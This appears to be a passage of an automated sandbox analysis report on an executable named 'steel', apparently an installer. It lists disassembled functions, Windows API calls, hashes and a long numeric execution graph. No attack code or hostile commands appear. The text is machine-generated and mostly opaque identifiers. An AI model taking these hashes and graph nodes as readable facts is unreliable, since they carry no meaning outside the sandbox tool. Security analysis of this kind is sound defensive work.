                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                            • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                            • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandHandleLineModule
                                                                                            • String ID: U1hd.@$%k
                                                                                            • API String ID: 2123368496-2691563094
                                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: )q@
                                                                                            • API String ID: 3660427363-2284170586
                                                                                            • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                            • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                            • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                            • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                            Strings
                                                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                            • Setup, xrefs: 00409CAD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                            • API String ID: 2030045667-3271211647
                                                                                            • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                            • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                            • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                            • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                            • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                            Execution Graph

                                                                                            Execution Coverage:16%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:4.7%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:84
50323->50311 50324->50312 50325->50315 50326 416644 50327 416651 50326->50327 50328 4166ab 50326->50328 50333 416550 CreateWindowExA 50327->50333 50329 416658 SetPropA SetPropA 50329->50328 50330 41668b 50329->50330 50331 41669e SetWindowPos 50330->50331 50331->50328 50333->50329 55962 4222e4 55963 4222f3 55962->55963 55968 421274 55963->55968 55966 422313 55969 4212e3 55968->55969 55982 421283 55968->55982 55972 4212f4 55969->55972 55993 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55969->55993 55971 421322 55974 421395 55971->55974 55979 42133d 55971->55979 55972->55971 55973 4213ba 55972->55973 55976 4213ce SetMenu 55973->55976 55990 421393 55973->55990 55981 4213a9 55974->55981 55974->55990 55975 4213e6 55996 4211bc 10 API calls 55975->55996 55976->55990 55985 421360 GetMenu 55979->55985 55979->55990 55980 4213ed 55980->55966 55991 4221e8 10 API calls 55980->55991 55984 4213b2 SetMenu 55981->55984 55982->55969 55992 408d2c 19 API calls 55982->55992 55984->55990 55986 421383 55985->55986 55987 42136a 55985->55987 55994 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55986->55994 55989 42137d SetMenu 55987->55989 55989->55986 55990->55975 55995 421e2c 11 API calls 55990->55995 55991->55966 55992->55982 55993->55972 55994->55990 55995->55975 55996->55980 55997 44b4a8 55998 44b4b6 55997->55998 56000 44b4d5 55997->56000 55999 44b38c 11 API calls 55998->55999 55998->56000 55999->56000 56001 448728 56002 448756 56001->56002 56003 44875d 56001->56003 56005 403400 4 API calls 56002->56005 56004 448771 56003->56004 56006 44852c 7 API calls 56003->56006 56004->56002 56007 403494 4 API calls 56004->56007 56008 448907 56005->56008 56006->56004 56009 44878a 56007->56009 56010 4037b8 4 API calls 56009->56010 56011 4487a6 56010->56011 56012 4037b8 4 API calls 56011->56012 56013 4487c2 56012->56013 56013->56002 56014 4487d6 56013->56014 56015 4037b8 4 API calls 56014->56015 56016 4487f0 56015->56016 56017 431bd0 4 API calls 56016->56017 56018 448812 56017->56018 
56019 431ca0 4 API calls 56018->56019 56026 448832 56018->56026 56019->56018 56020 448888 56033 442334 56020->56033 56021 448870 56021->56020 56045 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56021->56045 56025 4488bc GetLastError 56046 4484c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56025->56046 56026->56021 56044 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56026->56044 56028 4488cb 56047 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56028->56047 56030 4488e0 56048 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56030->56048 56032 4488e8 56034 443312 56033->56034 56035 44236d 56033->56035 56037 403400 4 API calls 56034->56037 56036 403400 4 API calls 56035->56036 56038 442375 56036->56038 56039 443327 56037->56039 56040 431bd0 4 API calls 56038->56040 56039->56025 56041 442381 56040->56041 56042 443302 56041->56042 56049 441a0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56041->56049 56042->56025 56044->56026 56045->56020 56046->56028 56047->56030 56048->56032 56049->56041 56050 4165ec DestroyWindow 56051 42e3ef SetErrorMode 50334 441394 50335 44139d 50334->50335 50336 4413ab WriteFile 50334->50336 50335->50336 50337 4413b6 50336->50337 50338 416410 50339 416422 50338->50339 50340 416462 GetClassInfoA 50339->50340 50358 408d2c 19 API calls 50339->50358 50341 41648e 50340->50341 50342 4164b0 RegisterClassA 50341->50342 50343 4164a0 UnregisterClassA 50341->50343 50348 4164e9 50341->50348 50345 4164d8 50342->50345 50342->50348 50343->50342 50359 408cbc 50345->50359 50346 41645d 50346->50340 50349 416506 50348->50349 50350 416517 50348->50350 50349->50348 50352 408cbc 5 API calls 50349->50352 50367 407544 50350->50367 50352->50350 50355 416530 50372 41a1e8 50355->50372 50357 41653a 50358->50346 50360 408cc8 50359->50360 50380 406dec LoadStringA 50360->50380 50365 403400 4 API calls 50366 408d0e 50365->50366 50366->50348 50368 407552 50367->50368 50369 407548 50367->50369 50371 418384 7 API calls 50368->50371 50370 402660 4 
API calls 50369->50370 50370->50368 50371->50355 50373 41a213 50372->50373 50374 41a2af 50372->50374 50389 403520 50373->50389 50375 403400 4 API calls 50374->50375 50376 41a2c7 50375->50376 50376->50357 50378 41a26b 50379 41a2a3 CreateFontIndirectA 50378->50379 50379->50374 50381 4034e0 4 API calls 50380->50381 50382 406e19 50381->50382 50383 403450 50382->50383 50385 403454 50383->50385 50387 403464 50383->50387 50384 403490 50384->50365 50386 4034bc 4 API calls 50385->50386 50385->50387 50386->50387 50387->50384 50388 402660 4 API calls 50387->50388 50388->50384 50390 4034e0 4 API calls 50389->50390 50391 40352a 50390->50391 50391->50378 56052 491bf8 56053 491c32 56052->56053 56054 491c34 56053->56054 56057 491c3e 56053->56057 56248 409098 MessageBeep 56054->56248 56056 491c39 56060 403420 4 API calls 56056->56060 56058 491c4d 56057->56058 56059 491c76 56057->56059 56061 446ff8 18 API calls 56058->56061 56064 491cae 56059->56064 56065 491c85 56059->56065 56062 49228a 56060->56062 56063 491c5a 56061->56063 56066 403400 4 API calls 56062->56066 56249 406bb0 56063->56249 56074 491cbd 56064->56074 56075 491ce6 56064->56075 56068 446ff8 18 API calls 56065->56068 56069 492292 56066->56069 56071 491c92 56068->56071 56257 406c00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56071->56257 56077 446ff8 18 API calls 56074->56077 56081 491d0e 56075->56081 56082 491cf5 56075->56082 56076 491c9d 56258 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56076->56258 56079 491cca 56077->56079 56259 406c34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56079->56259 56088 491d1d 56081->56088 56089 491d42 56081->56089 56261 407280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 56082->56261 56083 491cd5 56260 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56083->56260 56086 491cfd 56262 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56086->56262 56090 446ff8 18 API calls 56088->56090 56093 491d7a 
56089->56093 56094 491d51 56089->56094 56091 491d2a 56090->56091 56092 4072a8 SetCurrentDirectoryA 56091->56092 56095 491d32 56092->56095 56099 491d89 56093->56099 56100 491db2 56093->56100 56096 446ff8 18 API calls 56094->56096 56263 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56095->56263 56098 491d5e 56096->56098 56101 42c804 5 API calls 56098->56101 56102 446ff8 18 API calls 56099->56102 56107 491dfe 56100->56107 56108 491dc1 56100->56108 56103 491d69 56101->56103 56104 491d96 56102->56104 56264 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56103->56264 56265 4071f8 8 API calls 56104->56265 56114 491e0d 56107->56114 56115 491e36 56107->56115 56110 446ff8 18 API calls 56108->56110 56109 491da1 56266 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56109->56266 56112 491dd0 56110->56112 56113 446ff8 18 API calls 56112->56113 56116 491de1 56113->56116 56117 446ff8 18 API calls 56114->56117 56121 491e6e 56115->56121 56122 491e45 56115->56122 56267 4918fc 8 API calls 56116->56267 56119 491e1a 56117->56119 56123 42c8a4 5 API calls 56119->56123 56120 491ded 56268 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56120->56268 56130 491e7d 56121->56130 56131 491ea6 56121->56131 56125 446ff8 18 API calls 56122->56125 56126 491e25 56123->56126 56127 491e52 56125->56127 56269 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56126->56269 56129 42c8cc 5 API calls 56127->56129 56132 491e5d 56129->56132 56133 446ff8 18 API calls 56130->56133 56137 491ede 56131->56137 56138 491eb5 56131->56138 56270 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56132->56270 56135 491e8a 56133->56135 56271 42c8fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56135->56271 56143 491eed 56137->56143 56144 491f16 56137->56144 56140 446ff8 18 API calls 56138->56140 56139 491e95 56272 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56139->56272 56142 
491ec2 56140->56142 56145 42c92c 5 API calls 56142->56145 56146 446ff8 18 API calls 56143->56146 56151 491f62 56144->56151 56152 491f25 56144->56152 56147 491ecd 56145->56147 56148 491efa 56146->56148 56273 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56147->56273 56150 42c954 5 API calls 56148->56150 56153 491f05 56150->56153 56157 491f71 56151->56157 56158 491fb4 56151->56158 56154 446ff8 18 API calls 56152->56154 56274 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56153->56274 56156 491f34 56154->56156 56159 446ff8 18 API calls 56156->56159 56160 446ff8 18 API calls 56157->56160 56165 491fc3 56158->56165 56166 492027 56158->56166 56161 491f45 56159->56161 56163 491f84 56160->56163 56275 42c4f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56161->56275 56167 446ff8 18 API calls 56163->56167 56164 491f51 56276 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56164->56276 56169 446ff8 18 API calls 56165->56169 56173 492066 56166->56173 56174 492036 56166->56174 56170 491f95 56167->56170 56171 491fd0 56169->56171 56277 491af4 12 API calls 56170->56277 56240 42c608 7 API calls 56171->56240 56186 4920a5 56173->56186 56187 492075 56173->56187 56177 446ff8 18 API calls 56174->56177 56176 491fa3 56278 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56176->56278 56180 492043 56177->56180 56178 491fde 56181 491fe2 56178->56181 56182 492017 56178->56182 56281 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56180->56281 56185 446ff8 18 API calls 56181->56185 56280 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56182->56280 56190 491ff1 56185->56190 56195 4920e4 56186->56195 56196 4920b4 56186->56196 56188 446ff8 18 API calls 56187->56188 56191 492082 56188->56191 56189 492050 56282 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56189->56282 56241 452c80 56190->56241 56194 452770 5 API 
calls 56191->56194 56199 49208f 56194->56199 56204 49212c 56195->56204 56205 4920f3 56195->56205 56200 446ff8 18 API calls 56196->56200 56197 492061 56197->56056 56198 492001 56279 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56198->56279 56283 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56199->56283 56203 4920c1 56200->56203 56284 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56203->56284 56212 49213b 56204->56212 56213 492174 56204->56213 56207 446ff8 18 API calls 56205->56207 56209 492102 56207->56209 56208 4920ce 56285 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56208->56285 56211 446ff8 18 API calls 56209->56211 56215 492113 56211->56215 56214 446ff8 18 API calls 56212->56214 56218 492187 56213->56218 56224 49223d 56213->56224 56216 49214a 56214->56216 56220 447278 5 API calls 56215->56220 56217 446ff8 18 API calls 56216->56217 56219 49215b 56217->56219 56221 446ff8 18 API calls 56218->56221 56226 447278 5 API calls 56219->56226 56220->56056 56222 4921b4 56221->56222 56223 446ff8 18 API calls 56222->56223 56227 4921cb 56223->56227 56224->56056 56289 446f9c 18 API calls 56224->56289 56226->56056 56286 407ddc 7 API calls 56227->56286 56228 492256 56229 42e8c8 5 API calls 56228->56229 56230 49225e 56229->56230 56290 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56230->56290 56233 4921ed 56234 446ff8 18 API calls 56233->56234 56235 492201 56234->56235 56287 408508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56235->56287 56237 49220c 56288 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56237->56288 56239 492218 56240->56178 56242 452724 2 API calls 56241->56242 56243 452c99 56242->56243 56244 452c9d 56243->56244 56245 452cc1 MoveFileA GetLastError 56243->56245 56244->56198 56246 452760 Wow64RevertWow64FsRedirection 56245->56246 56247 452ce7 56246->56247 56247->56198 56248->56056 56250 406bbf 
56249->56250 56251 406be1 56250->56251 56252 406bd8 56250->56252 56254 403778 4 API calls 56251->56254 56253 403400 4 API calls 56252->56253 56255 406bdf 56253->56255 56254->56255 56256 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56255->56256 56256->56056 56257->56076 56258->56056 56259->56083 56260->56056 56261->56086 56262->56056 56263->56056 56264->56056 56265->56109 56266->56056 56267->56120 56268->56056 56269->56056 56270->56056 56271->56139 56272->56056 56273->56056 56274->56056 56275->56164 56276->56056 56277->56176 56278->56056 56279->56056 56280->56056 56281->56189 56282->56197 56283->56056 56284->56208 56285->56056 56286->56233 56287->56237 56288->56239 56289->56228 56290->56056 56291 40cc34 56294 406f10 WriteFile 56291->56294 56295 406f2d 56294->56295 50392 48095d 50397 451004 50392->50397 50394 480971 50407 47fa0c 50394->50407 50396 480995 50398 451011 50397->50398 50400 451065 50398->50400 50416 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50398->50416 50413 450e88 50400->50413 50404 45108d 50405 4510d0 50404->50405 50418 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50404->50418 50405->50394 50423 40b3c8 50407->50423 50409 47fa79 50409->50396 50412 47fa2e 50412->50409 50427 4069dc 50412->50427 50430 476994 50412->50430 50419 450e34 50413->50419 50416->50400 50417 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50417->50404 50418->50405 50420 450e57 50419->50420 50421 450e46 50419->50421 50420->50404 50420->50417 50422 450e4b InterlockedExchange 50421->50422 50422->50420 50424 40b3d3 50423->50424 50426 40b3f3 50424->50426 50446 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50424->50446 50426->50412 50428 402648 4 API calls 50427->50428 50429 4069e7 50428->50429 50429->50412 50438 4769c5 50430->50438 50444 476a0e 50430->50444 50431 476a59 50447 451294 50431->50447 50432 451294 21 API calls 50432->50444 50435 476a70 50437 403420 4 API calls 50435->50437 50436 4038a4 4 API calls 50436->50444 50439 
476a8a 50437->50439 50441 403450 4 API calls 50438->50441 50438->50444 50445 451294 21 API calls 50438->50445 50453 4038a4 50438->50453 50462 403744 50438->50462 50439->50412 50441->50438 50442 403744 4 API calls 50442->50444 50443 403450 4 API calls 50443->50444 50444->50431 50444->50432 50444->50436 50444->50442 50444->50443 50445->50438 50446->50426 50448 4512a4 50447->50448 50449 4512af 50447->50449 50448->50435 50466 451238 21 API calls 50449->50466 50451 4512ba 50451->50448 50467 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50451->50467 50454 4038b1 50453->50454 50461 4038e1 50453->50461 50456 4038da 50454->50456 50459 4038bd 50454->50459 50455 403400 4 API calls 50458 4038cb 50455->50458 50457 4034bc 4 API calls 50456->50457 50457->50461 50458->50438 50468 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50459->50468 50461->50455 50463 40374a 50462->50463 50465 40375b 50462->50465 50464 4034bc 4 API calls 50463->50464 50463->50465 50464->50465 50465->50438 50466->50451 50467->50448 50468->50458 50469 41ee54 50470 41ee63 IsWindowVisible 50469->50470 50471 41ee99 50469->50471 50470->50471 50472 41ee6d IsWindowEnabled 50470->50472 50472->50471 50473 41ee77 50472->50473 50474 402648 4 API calls 50473->50474 50475 41ee81 EnableWindow 50474->50475 50475->50471 50476 46bb10 50477 46bb44 50476->50477 50509 46bfad 50476->50509 50479 46bb80 50477->50479 50482 46bbdc 50477->50482 50483 46bbba 50477->50483 50484 46bbcb 50477->50484 50485 46bb98 50477->50485 50486 46bba9 50477->50486 50478 403400 4 API calls 50481 46bfec 50478->50481 50479->50509 50567 468c74 50479->50567 50487 403400 4 API calls 50481->50487 50799 46baa0 45 API calls 50482->50799 50532 46b6d0 50483->50532 50798 46b890 67 API calls 50484->50798 50796 46b420 47 API calls 50485->50796 50797 46b588 42 API calls 50486->50797 50493 46bff4 50487->50493 50494 46bb9e 50494->50479 50494->50509 50495 46bc5b 50499 414ae8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50495->50499 50500 46bd7e 
50495->50500 50503 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50495->50503 50504 42cbc0 6 API calls 50495->50504 50506 46af68 23 API calls 50495->50506 50495->50509 50510 46bdd7 50495->50510 50528 46be9f 50495->50528 50570 468bb0 50495->50570 50578 46acd4 50495->50578 50723 483084 50495->50723 50836 46b1dc 19 API calls 50495->50836 50496 46bc18 50496->50495 50496->50509 50800 494da0 50496->50800 50499->50495 50819 48358c 123 API calls 50500->50819 50503->50495 50504->50495 50505 46bd99 50505->50509 50506->50495 50509->50478 50585 469f1c 50510->50585 50511 46af68 23 API calls 50511->50509 50513 46be3d 50514 403450 4 API calls 50513->50514 50515 46be4d 50514->50515 50516 46bea9 50515->50516 50517 46be59 50515->50517 50522 46bf6b 50516->50522 50646 46af68 50516->50646 50820 457f1c 50517->50820 50521 457f1c 24 API calls 50521->50528 50528->50511 50837 46c424 50532->50837 50535 46b852 50536 403420 4 API calls 50535->50536 50538 46b86c 50536->50538 50540 403400 4 API calls 50538->50540 50539 46b71e 50566 46b83e 50539->50566 50844 455f84 13 API calls 50539->50844 50542 46b874 50540->50542 50541 403450 4 API calls 50541->50535 50544 403400 4 API calls 50542->50544 50545 46b87c 50544->50545 50545->50479 50546 46b801 50546->50535 50552 42cd48 7 API calls 50546->50552 50546->50566 50549 46b73c 50550 46b7a1 50549->50550 50845 466600 50549->50845 50550->50535 50550->50546 50854 42cd48 50550->50854 50555 46b817 50552->50555 50560 451458 4 API calls 50555->50560 50555->50566 50562 46b82e 50560->50562 50861 47efd0 42 API calls 50562->50861 50566->50535 50566->50541 50568 468bb0 19 API calls 50567->50568 50569 468c83 50568->50569 50569->50496 50574 468bdf 50570->50574 50571 4078f4 19 API calls 50572 468c18 50571->50572 51114 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50572->51114 50574->50571 50575 468c20 50574->50575 50576 403400 4 API calls 50575->50576 50577 468c38 50576->50577 50577->50495 50579 46ace5 50578->50579 50580 46ace0 50578->50580 51200 469a80 46 
API calls 50579->51200 50581 46ace3 50580->50581 51115 46a740 50580->51115 50581->50495 50583 46aced 50583->50495 50586 403400 4 API calls 50585->50586 50587 469f4a 50586->50587 51577 47dd00 50587->51577 50589 469fad 50590 469fb1 50589->50590 50591 469fca 50589->50591 51584 466800 50590->51584 50593 469fbb 50591->50593 51587 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50591->51587 50594 46a25e 50593->50594 50596 46a154 50593->50596 50597 46a0e9 50593->50597 50598 403420 4 API calls 50594->50598 50602 403494 4 API calls 50596->50602 50601 403494 4 API calls 50597->50601 50603 46a288 50598->50603 50599 469fe6 50599->50593 50600 469fee 50599->50600 50604 46af68 23 API calls 50600->50604 50605 46a0f6 50601->50605 50606 46a161 50602->50606 50603->50513 50613 469ffb 50604->50613 50607 40357c 4 API calls 50605->50607 50608 40357c 4 API calls 50606->50608 50609 46a103 50607->50609 50610 46a16e 50608->50610 50611 40357c 4 API calls 50609->50611 50612 40357c 4 API calls 50610->50612 50614 46a110 50611->50614 50615 46a17b 50612->50615 50618 46a024 SetActiveWindow 50613->50618 50619 46a03c 50613->50619 50616 40357c 4 API calls 50614->50616 50617 40357c 4 API calls 50615->50617 50620 46a11d 50616->50620 50621 46a188 50617->50621 50618->50619 51588 42f560 50619->51588 50623 466800 20 API calls 50620->50623 50622 40357c 4 API calls 50621->50622 50625 46a196 50622->50625 50624 46a12b 50623->50624 50626 40357c 4 API calls 50624->50626 50627 414b18 4 API calls 50625->50627 50629 46a134 50626->50629 50630 46a152 50627->50630 50632 40357c 4 API calls 50629->50632 51605 466b38 50630->51605 50635 46a141 50632->50635 50637 414b18 4 API calls 50635->50637 50636 46a08d 50638 46ade4 21 API calls 50636->50638 50637->50630 50639 46a0bf 50638->50639 50639->50513 50647 468c74 19 API calls 50646->50647 50648 46af80 50647->50648 50649 46afa2 50648->50649 50650 4652cc 7 API calls 50648->50650 51790 4652cc 50649->51790 50650->50649 50654 46afba 50655 46ade4 21 API calls 50654->50655 50656 
46aff2 50655->50656 50657 414b18 4 API calls 50656->50657 50658 46b006 50657->50658 50659 46b012 50658->50659 50660 46b03c 50658->50660 50661 414b18 4 API calls 50659->50661 50662 46b05b 50660->50662 50663 46b085 50660->50663 50664 46b026 50661->50664 50665 414b18 4 API calls 50662->50665 50666 414b18 4 API calls 50663->50666 50667 414b18 4 API calls 50664->50667 50668 46b06f 50665->50668 50669 46b099 50666->50669 50724 46c424 48 API calls 50723->50724 50725 4830c7 50724->50725 50726 4830d0 50725->50726 52066 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50725->52066 50728 414ae8 4 API calls 50726->50728 50729 4830e0 50728->50729 50730 403450 4 API calls 50729->50730 50731 4830ed 50730->50731 51868 46c77c 50731->51868 50734 4830fd 50736 414ae8 4 API calls 50734->50736 50737 48310d 50736->50737 50738 403450 4 API calls 50737->50738 50739 48311a 50738->50739 50740 469868 SendMessageA 50739->50740 50741 483133 50740->50741 50742 483184 50741->50742 52068 479e18 23 API calls 50741->52068 51897 4241dc IsIconic 50742->51897 50746 48319f SetActiveWindow 50747 4831b4 50746->50747 51905 4824b4 50747->51905 50796->50494 50797->50479 50798->50479 50799->50479 53729 43d9c8 50800->53729 50803 494dcc 53734 431bd0 50803->53734 50804 494e52 50805 494e61 50804->50805 53767 4945c8 